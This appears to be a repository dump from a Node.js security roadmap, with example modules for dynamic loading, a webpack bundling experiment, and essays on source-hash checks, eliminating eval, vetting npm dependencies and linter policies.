9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // index.js 19 | // Example that tests various kinds of loads. 20 | 21 | let staticLoad = require('./lib/static'); 22 | function dynamicLoad(f, x) { 23 | return f('./lib/' + x); 24 | } 25 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus'); 26 | exports.lazyLoad = () => require('./lib/lazy'); 27 | 28 | // Fallback to alternatives 29 | require(['./lib/opt1', './lib/opt2'].find( 30 | (name) => { 31 | try { 32 | require.resolve(name); 33 | return true; 34 | } catch (_) { 35 | return false; 36 | } 37 | })); 38 | -------------------------------------------------------------------------------- /chapter-2/example/lib/dynamic.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/dynamic.js 19 | 20 | exports.x = 'dynamic'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/lib/lazy.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/lazy.js 19 | 20 | exports.x = 'lazy'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/lib/opt2.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/opt2.js 19 | 20 | exports.x = 'opt2'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/lib/static.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // lib/static.js 19 | 20 | exports.x = 'static'; 21 | -------------------------------------------------------------------------------- /chapter-2/example/make_dep_graph.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | set -e 18 | 19 | cd "$(dirname "$0")" 20 | 21 | mkdir -p graphs 22 | ( 23 | echo 'digraph Modules {' 24 | 25 | # Run the tests and filter the logs for log entries from our 26 | # hacked Module._load. 27 | # Also relativize source file paths. 28 | NODE=/Users/msamuel/work/node/out/Release/node \ 29 | PATH="/Users/msamuel/work/node/out/Release/:$PATH" \ 30 | ./node_modules/.bin/mocha 2>&1 \ 31 | | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }' 32 | 33 | # Add an edge from package.json to the main module. 34 | echo ' "./package.json" -> "./index.js";' 35 | echo ' "./package.json" [fillcolor=black,fontcolor=white,style=filled];' 36 | echo '}' 37 | ) > graphs/full.dot 38 | 39 | python -c ' 40 | import re 41 | import sys 42 | 43 | EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""") 44 | GRAPH_END_RE = re.compile(r"^ *\}") 45 | 46 | edges = {} 47 | def add_edge(src, tgt): 48 | tgts = edges.get(src) 49 | if tgts is None: 50 | tgts = [] 51 | edges[src] = tgts 52 | tgts.append(tgt) 53 | 54 | for line in sys.stdin: 55 | edges_match = EDGE_RE.match(line) 56 | if edges_match is not None: 57 | add_edge(edges_match.group(1), edges_match.group(2)) 58 | continue 59 | elif GRAPH_END_RE.match(line): 60 | reachable = set() 61 | def find_reachable(src): 62 | if src not in reachable: 63 | reachable.add(src) 64 | for tgt in edges.get(src, ()): 65 | find_reachable(tgt) 66 | find_reachable("\"./package.json\"") 67 | reachable = list(reachable) 68 | reachable.sort() 69 | for src in reachable: 70 | for tgt in edges.get(src, ()): 71 | print " %s -> %s;" % (src, tgt) 72 | print line, 73 | ' < graphs/full.dot > graphs/filtered.dot 74 | 75 | for graph in full filtered; do 76 | dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg 77 | done 78 | 79 | # Start walking from package.json 80 | 81 | -------------------------------------------------------------------------------- /chapter-2/example/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "dynamism-example", 3 | "private": true, 4 | "description": "Example code that shows dynamically walking the test graph", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo $NODE; ./node_modules/.bin/mocha" 8 | }, 9 | "author": "Mike Samuel", 10 | "license": "Apache-2.0", 11 | "devDependencies": { 12 | "chai": ">=4.1.2", 13 | "mocha": ">=4.0.1" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /chapter-2/example/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | // test/test.js 19 | 20 | var expect = require("chai").expect; 21 | var app = require("../index"); 22 | 23 | describe("My TestSuite", () => { 24 | describe("A test", () => { 25 | it("A unittest", () => { 26 | // Exercise the API 27 | app.lazyLoad(); 28 | }); 29 | }); 30 | }); 31 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/.gitignore: -------------------------------------------------------------------------------- 1 | dist 2 | node_modules -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/goodbye.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | exports.say = x => console.log(`Goodbye, ${x}!`); 19 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/hello.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | exports.say = x => console.log(`Hello, ${x}!`); 19 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/index.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | var metadata = require('./package.json'); 19 | var greeting = require('./' + metadata.greeting); 20 | 21 | greeting.say('World'); 22 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "webpack-compat-experiment", 3 | "description": "Figuring out how well webpack deals with dynamic loads", 4 | "version": "0.0.0", 5 | "main": "index.js", 6 | "dependencies": {}, 7 | "scripts": {}, 8 | "author": "Mike Samuel", 9 | "license": "Apache-2.0", 10 | "greeting": "hello", 11 | "devDependencies": { 12 | "webpack": "^3.10.0" 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/test-utils.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | exports.doSomethingScaryButItsOkInTest = function() { 19 | throw new Error('test-utils.js: NOT PRODUCTION CODE'); 20 | }; 21 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/test.sh: -------------------------------------------------------------------------------- 1 | echo <&1 | grep -q 'Hello, World!'; then 43 | echo 'Ran ok' 44 | else 45 | echo 'Failed to bundle dependency' 46 | fi 47 | 48 | echo 49 | echo Looking for non production code 50 | if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then 51 | echo 'Webpack bundled test code in its minimal configuration' 52 | false 53 | fi 54 | 55 | # */ 56 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | console.log('test/test.js: NOT PRODUCTION CODE'); 19 | -------------------------------------------------------------------------------- /chapter-2/experiments/webpack-compat/webpack.config.js: -------------------------------------------------------------------------------- 1 | const path = require('path'); 2 | 3 | module.exports = { 4 | output: { 5 | path: path.resolve('./dist'), 6 | filename: 'bundle.js', 7 | }, 8 | entry: path.resolve('./index.js') 9 | }; 10 | -------------------------------------------------------------------------------- /chapter-2/source-contents.md: -------------------------------------------------------------------------------- 1 | # Source Content Checks 2 | 3 | The node runtime's module loader uses the `_compile` method to actually 4 | turn file content into code thus: 5 | 6 | ```js 7 | // Run the file contents in the correct scope or sandbox. Expose 8 | // the correct helper variables (require, module, exports) to 9 | // the file. 10 | // Returns exception, if any. 11 | Module.prototype._compile = function(content, filename) { 12 | content = internalModule.stripShebang(content); 13 | 14 | // create wrapper function 15 | var wrapper = Module.wrap(content); 16 | 17 | var compiledWrapper = vm.runInThisContext(wrapper, { 18 | ``` 19 | 20 | At the top of that method body, we can check that the content 21 | is on a list of production sources. 22 | 23 | The entire process looks like: 24 | 25 | 1. Developer develops and tests their app iteratively as normal. 26 | 2. The developer generates a list of production sources via the 27 | dynamic bundling scheme outlined earlier, a static tool like 28 | webpack, or some combination. 29 | 3. The bundling tool generates a file with a cryptographic hash 30 | for each production source. 31 | We prefer hashing to checking paths for reasons that will become 32 | apparent later when we discuss `eval`. 33 | 4. A deploy script copies the bundle and the hashes to a production server. 34 | 5. The server startup script passes a flag to `node` or `npm start` 35 | telling the runtime where to look for the production source hashes. 36 | 6. The runtime reads the hashes and combines it with any hashes necessary 37 | to whitelist any `node` internal JavaScript files that might load 38 | via `require`. 39 | 7. When a call to `require(x)` reaches `Module.prototype.compile` 40 | it hashes `content` and checks that the hash is in the allowed set. 41 | If not, it logs that and, if not in report-only-mode, 42 | raises an exception. 43 | 8. Normal log collecting and monitoring communicates failures 44 | to the development team. 45 | 46 | This is similar to [Content-Security-Policy (CSP)][csp] but for 47 | server-side code. Like CSP, there is an intermediate step that might 48 | be useful between no enforcement and full enforcement: 49 | [report only mode][]. 50 | 51 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/ 52 | [report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only 53 | -------------------------------------------------------------------------------- /chapter-2/synthetic-modules.md: -------------------------------------------------------------------------------- 1 | # Statically eliminating `eval` 2 | 3 | Pug provides a flexible API to load Pug templates from `.pug` files 4 | that `eval`s the generated code ([code][pug-eval]), 5 | and a command line interface for precompiling Pug files. 6 | 7 | Let's ignore those and imagine ways to allow a Pug user to 8 | compile a Pug template that makes the static nature apparent 9 | even to an analysis which doesn't make assumptions about the 10 | contents of `.pug` files. 11 | 12 | ```js 13 | const pug = require('pug'); 14 | 15 | exports.myTemplate = pug.lang` 16 | doctype html 17 | html 18 | head 19 | ...`; 20 | ``` 21 | 22 | This code snippet uses a [tagged template literal][] to allow Pug 23 | template code to appear inline in a JavaScript file. 24 | 25 | Rather than loading a `.pug` file, we have declared it in JavaScript. 26 | 27 | Imagine further that `pug.lang` runs the compiler, but instead of 28 | using `new Function(...)` it uses some new module API 29 | 30 | ```js 31 | require.synthesize(generatedCode) 32 | ``` 33 | 34 | which could manufacture a `Module` instance with the generated code and 35 | install the module into the cache with the input hash as its filename. 36 | 37 | When [bundling](bundling.md), we could dump the content of synthesized 38 | modules, and, when the bundle loads in production, pre-populate 39 | the module cache. When the `pug.lang` implementation asks the 40 | module loader to create a module with the content between 41 | `...` it would find a resolved module ready but not 42 | loaded. If a module is already in the cache, `Module` skips the 43 | additional content checks. 44 | 45 | The Node runtime function, `makeRequireFunction` 46 | ([code][makeRequireFunction]), defines a `require` for each module 47 | that loads modules with the current module as the parent. That would 48 | also have to define a module specific `require.synthesize` that does 49 | something like: 50 | 51 | ```js 52 | function synthesize(content) { 53 | content = String(content); 54 | // Hashing gives us a stable identifier so that we can associate 55 | // code inlined during bundling with that loaded in production. 56 | const hash = crypto 57 | .createHash('sha512') 58 | .update(content, 'utf8') 59 | .digest(); 60 | // A name that communicates the source while being 61 | // unambiguous with any actual file. 62 | const filename = '/dev/null/synthetic/' + hash; 63 | // We scope the identifier so that it is clear in 64 | // debugging trace that the module is synthetic and 65 | // to avoid leading existing tools to conclude that 66 | // it is available via registry.npmjs.org. 67 | const id = '@node-internal-synthetic/' + hash; 68 | const cache = Module._cache; 69 | let syntheticModule = cache[filename]; 70 | if (syntheticModule) { 71 | // TODO: updateChildren(mod, syntheticModule, true); 72 | } else { 73 | cache[filename] = syntheticModule = new Module(id, mod); 74 | syntheticModule.loaded = true; 75 | syntheticModule._compile(content, filename); 76 | } 77 | // TODO: dump the module if the command line flags specify 78 | // a synthetic_node_modules/ output directory. 79 | return syntheticModule; 80 | } 81 | 82 | require.synthesize = synthesize; 83 | ``` 84 | 85 | Static analysis tools often benefit from having a whole program 86 | available. Humans can reason about external files, like `.pug` files, 87 | but static analysis tools often have to be unsound, or assume the 88 | worst. Synthetic modules may provide a way to move a large chunk of 89 | previously unanalyzable code into the domain of what static analysis 90 | tools can check. 91 | 92 | This scheme, might be more discoverable if code generator authors 93 | adopted some conventions: 94 | 95 | * If a module defines `exports.lang` it should be usable as a 96 | template tag. 97 | * If that same function is called with an option map instead 98 | of as a template tag function, then it should return a function 99 | to enable usages like 100 | ```js 101 | pug.lang(myPugOptionMap)` 102 | doctype html 103 | ...` 104 | ``` 105 | * If the first line starts with some whitespace, all subsequent 106 | lines have that same whitespace as a prefix, and the language 107 | is whitespace-sensitive, then strip it before processing. 108 | This would allow indenting inline DSLs within a larger 109 | JavaScript program. 110 | 111 | We discuss template tag usability concerns in more detail later when 112 | discussing [library tweaks][library]. 113 | 114 | This proposal has one major drawback: we still have to trust the code 115 | generator. Pug's code generator looks well structured, but reasoning 116 | about all the code produced by a code generator is harder than 117 | reasoning about one hand-written module. The [frozen realms][] proposal 118 | restricts code to a provided API like 119 | `vm.runInNewContext` aimed to. If Pug, for example, chose to load its 120 | code in a sandbox, then checking just the provided context would give 121 | us confidence about what generated code could do. In some cases, we 122 | might be able to move code generator outside the 123 | [*trusted computing base*][TCB]. 124 | 125 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals 126 | [pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263 127 | [library]: ../chapter-7/libraries.md 128 | [makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5 129 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms 130 | [TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base 131 | -------------------------------------------------------------------------------- /chapter-2/what-about-eval.md: -------------------------------------------------------------------------------- 1 | # What about `eval`? 2 | 3 | Previously we've talked about how to control what code loads 4 | from the file system, but not what code loads from strings. 5 | 6 | The rest of this discussion uses the term "`eval`" to refer to any of 7 | the `eval` operator, the `eval` function, `new Function`, 8 | `vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][] 9 | and other operators that convert strings or bytes into code. 10 | 11 | Recall that it is difficult to prove that code 12 | [does not `eval`](../chapter-1/threat-RCE.md): 13 | 14 | ```js 15 | var x = {}, 16 | a = 'constructor', 17 | b = 'constructor', 18 | s = 'console.log(s)'; 19 | x[a][b](s)(); 20 | ``` 21 | 22 | Some node projects deploy with a tweaked node runtime that turns off 23 | some `eval` operators, but there are widely used npm modules that use 24 | them carefully. For example: 25 | 26 | * [Pug][] generates HTML from templates. 27 | * [Mathjs][] evaluates closed-form mathematical expressions. 28 | 29 | Both generate JavaScript code under the hood, which is dynamically 30 | parsed. Let's consider two use cases: 31 | 32 | * Pug's code generator is usually called with trusted inputs, e.g. 33 | `.pug` files authored by trusted developers. 34 | * Mathjs is often called with untrusted inputs. If a developer 35 | wanted to let a user generate an ad-hoc report without having to 36 | download data into a spreadsheet, they might use Mathjs to parse 37 | user-supplied arithmetic expressions ([docs][more_secure_eval]) 38 | instead of trying to check that an input is safe to `eval` via 39 | `RegExp`s. It is not without risk ([advisory][adv552]) 40 | though [^1]. 41 | 42 | These two uses of code generators fall at either end of a spectrum. 43 | The uses of Pug seem static, all the information is available before 44 | we deploy. Our Mathjs use case is necessarily dynamic since the 45 | input is not available until a user is in the loop. 46 | 47 | Next we discuss ways to recognize and simplify the former, while 48 | double-checking the latter. On the client, we have no options between 49 | allowing implicit `eval` and banning all uses of `eval`. There are 50 | fewer compelling use cases on the client since it is harder to 51 | amortize code generation over multiple requests. On the server, use 52 | of `eval` in the presence of untrusted inputs still needs to be 53 | carefully vetted. We explore ways to programatically enforce vetting 54 | decisions short of a blanket ban, but turning off `eval` before 55 | accepting untrusted inputs is still the most reliable way to prevent 56 | attackers from using `eval` against you. 57 | 58 | [^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue] 59 | 60 | 61 | [`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile 62 | [Pug]: https://pugjs.org/ 63 | [Mathjs]: http://mathjs.org/ 64 | [more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html 65 | [adv552]: https://nodesecurity.io/advisories/552 66 | [no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278 67 | -------------------------------------------------------------------------------- /chapter-3/knowing_dependencies.md: -------------------------------------------------------------------------------- 1 | # Knowing your dependencies 2 | 3 | ## Background 4 | 5 | [`npmjs` search results][npmjs/node] have stats on download count and 6 | open issues and PRs. 7 | 8 | npmjs.com stats for module node 9 | 10 | Each package page also links to the corresponding GitHub project 11 | which has links to the project's [pulse][github-pulse]. 12 | 13 | Both of these give an idea of how popular the project is, and 14 | whether it's actively developed. 15 | 16 | On their Github pages, many projects proudly display 17 | [badges and shields][] indicating their continuous integration status, 18 | and other vital statistics. 19 | 20 | The Linux Core Infrastructure project espouses a set of 21 | [best practices badges][bpb] and define tiers for mature infrastructure 22 | projects. We get some of the basic items for free by distributing via 23 | `npm`, but other items bear on how responsive the project might be to 24 | vulnerability reports and how it might respond to attempts to inject 25 | malicious code: 26 | 27 | * Another will have the necessary access rights if someone dies 28 | * Monitor external dependencies to detect/fix known vulnerabilities 29 | * At least 2 unassociated significant contributors 30 | * Use 2FA 31 | * At least 50% of all modifications are reviewed by another 32 | * Have a security review (internal or external) 33 | 34 | "Use 2FA" is possible with npm but it is not clear that it is widely 35 | practiced. [MTP][] discusses the support already built into Github 36 | and `npm profile`. 37 | 38 | 39 | ## Problem 40 | 41 | Threats: [LQC][] [MTP][] 42 | 43 | The npm repository, like other open-source code repositories, 44 | contains mature and well-maintained modules, but also plenty of 45 | bleeding-edge code that has not yet had bugs ironed out. 46 | 47 | A wise technical lead might decide that they can use third-party 48 | dependencies that have been widely used in production for several 49 | years by projects with similar needs since gross errors are likely 50 | to have been fixed. 51 | 52 | That technical lead might also decide that they can use bleeding edge 53 | code when they have enough local expertise to vet it, identify 54 | corner-cases they need to check, and fix any gross errors they 55 | encounter. 56 | 57 | Either way, that decision to use bleeding-edge code or code that might 58 | not be maintained over the long term should be a conscious one. 59 | 60 | 61 | ## Success Criteria 62 | 63 | Development teams are rarely surprised when code that they had built a 64 | prototype on later turns out not to be ready for production use, and 65 | they do not have to pore over others' code to vet many dependencies. 66 | 67 | ## A Possible Solution 68 | 69 | The building blocks of a solution probably already exist. 70 | 71 | ### Aggregate more signals 72 | 73 | `npmjs.com` may or may not be the right place to do this, but we 74 | should, as a community, aggregate signals about modules and make 75 | them readily available. 76 | 77 | `npmjs.com/package` already aggregates some useful signals, but 78 | it or another forum could aggregate more including 79 | 80 | - More of the GitHub pulse information including 81 | closed issues, PRs over time. 82 | - Relevant badges & shields for the project itself. 83 | - Relevant badges & shields by percentage of transitive 84 | dependencies and peer dependencies that have them. 85 | - Support channels, e.g. slack & discord. 86 | - Vulnerability reports and the version they affect. 87 | See sources in ["When all else fails"][failing] 88 | - Weighted mean of age of production dependencies transitively. 89 | - Results of linters (see [oversight][]) run without respecting 90 | [inline ignore comments][eslint-ignore-line] and 91 | [file ignore directives][eslint-ignore-file]. 92 | 93 | Users deciding whether to buy something from an online store or 94 | download a cellphone app from an app store have reviews 95 | and comments from other users. That members of the community take 96 | time to weigh in can be a useful signal, and the details can help 97 | clarify whether this module or an alternative might be better for a 98 | specific use. 99 | 100 | Large organizations who host [internal replicas][] may already have a 101 | lot of the opinion available internally, but aggregating that across 102 | clients can help smaller organizations and large organizations 103 | that are debating whether to dip their toe in. 104 | 105 | 106 | ### Leadership & Developer outreach 107 | 108 | The node runtime already [passes][CI-node] the Linux Foundation's best 109 | practices criteria, but could lead the way by explaining how a project 110 | that pushes from GitHub to `registry.npmjs.org` can pass more of these 111 | criteria. 112 | 113 | 114 | [npmjs/node]: https://www.npmjs.com/package/node 115 | [github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse 116 | [badges and shields]: https://github.com/badges/shields 117 | [bpb]: https://github.com/coreinfrastructure/best-practices-badge 118 | [internal replicas]: ../chapter-4/close_dependencies.md 119 | [failing]: ../chapter-6/failing.md 120 | [CRY]: ../chapter-1/threat-CRY.md 121 | [LQC]: ../chapter-1/threat-LQC.md 122 | [MTP]: ../chapter-1/threat-MTP.md 123 | [oversight]: ../chapter-5/oversight.md 124 | [eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments 125 | [eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories 126 | [CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js 127 | -------------------------------------------------------------------------------- /chapter-5/oversight.md: -------------------------------------------------------------------------------- 1 | # Oversight 2 | 3 | 4 | ## Problem 5 | 6 | Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][] 7 | 8 | Manually reviewing third party modules for known security problems 9 | is time consuming. 10 | 11 | Having developers wait for such review unnecessarily slows down 12 | development. 13 | 14 | Our engineering processes ought not force us to choose between 15 | forgoing sanity checks and shipping code in a timely manner. 16 | 17 | 18 | ## Background 19 | 20 | [JSConformance][] allows a project team to specify a policy for 21 | Closure JavaScript. This policy can encode lessons learned about APIs 22 | that are prone to misuse. By taking into account type information 23 | about arguments and `this`-values it can distinguish problematic 24 | patterns like `setTimeout(aString, dt)` from unproblematic ones 25 | `setTimeout(aFunction, dt)`. 26 | 27 | [TSLint][tslint] and [ESLint][eslint] both allow custom rules so can 28 | be extended as a project or developer community identifies Good and 29 | Bad parts of JavaScript for their particular context. 30 | 31 | 32 | 33 | ## A possible solution 34 | 35 | ### Encode lessons learned by the community in linter policies 36 | 37 | Instead of having security specialists reviewing lots of code 38 | they should focus on improving tools. 39 | Some APIs and idioms are more prone to misuse than others, and some 40 | should be deprecated in favor of more robust ways of expressing the 41 | same idea. As the community reaches a rough consensus that a code 42 | pattern is prone to misuse or there is a more robust alternative, we 43 | could try to encode that knowledge in an automatable policy. 44 | 45 | Linters are not perfect. There are no sound production-quality static 46 | type systems for JavaScript, so its linters are also necessarily 47 | heuristic. TSLint typically has more fine-grained type information 48 | available than ESLint, so there are probably more anti-patterns that 49 | TSLint can identify with an acceptable false-positive rate than 50 | ESLint, but feedback about what can and can't be expressed in ESLint 51 | might give its maintainers useful feedback. 52 | 53 | Linters can reduce the burden on reviewers by enabling computer aided 54 | code review — helping reviewers focus on areas that use powerful 55 | APIs, and giving a sense of the kinds of problems to look out for. 56 | 57 | They can also give developers a sense of how controversial a review 58 | might be, and guide them in asking the right kinds of questions. 59 | 60 | Custom policies can also help educate developers about alternatives. 61 | 62 | The rule below specifies an anti-pattern for client-side JavaScript 63 | in machine-checkable form, assigns it a name, has a short summary that 64 | can appear in an error message, and a longer description or 65 | documentation URL that explains the reasoning behind the rule. 66 | 67 | It also documents a number of known exceptions to the rule, for 68 | example, APIs that wrap `document.write` to do additional checks. 69 | 70 | ```pb 71 | requirement: { 72 | rule_id: 'closure:documentWrite' 73 | type: BANNED_PROPERTY 74 | error_message: 'Using Document.prototype.write is not allowed. ' 75 | 'Use goog.dom.safe.documentWrite instead.' 76 | '' 77 | 'Any content passed to write() will be automatically ' 78 | 'evaluated in the DOM and therefore the assignment of ' 79 | 'user-controlled, insufficiently sanitized or escaped ' 80 | 'content can result in XSS vulnerabilities.' 81 | '' 82 | 'Document.prototype.write is bad for performance as it ' 83 | 'forces document reparsing, has unpredictable semantics ' 84 | 'and disallows many optimizations a browser may make. ' 85 | 'It is almost never needed.' 86 | '' 87 | 'Exceptions allowed for:' 88 | '* writing to a completely new window such as a popup ' 89 | ' or an iframe.' 90 | '* frame busting.' 91 | '' 92 | 'If you need to use it, use the type-safe ' 93 | 'goog.dom.safe.documentWrite wrapper, or directly ' 94 | 'render a Strict Soy template using ' 95 | 'goog.soy.Renderer.prototype.renderElement (or similar).' 96 | 97 | value: 'Document.prototype.write' 98 | value: 'Document.prototype.writeln' 99 | 100 | # These uses have been determined to be safe by manual review. 101 | whitelist: 'javascript/closure/async/nexttick.js' 102 | whitelist: 'javascript/closure/base.js' 103 | whitelist: 'javascript/closure/dom/safe.js' 104 | } 105 | ``` 106 | 107 | ---- 108 | 109 | We propose a project that maintains a set of linter policies per language: 110 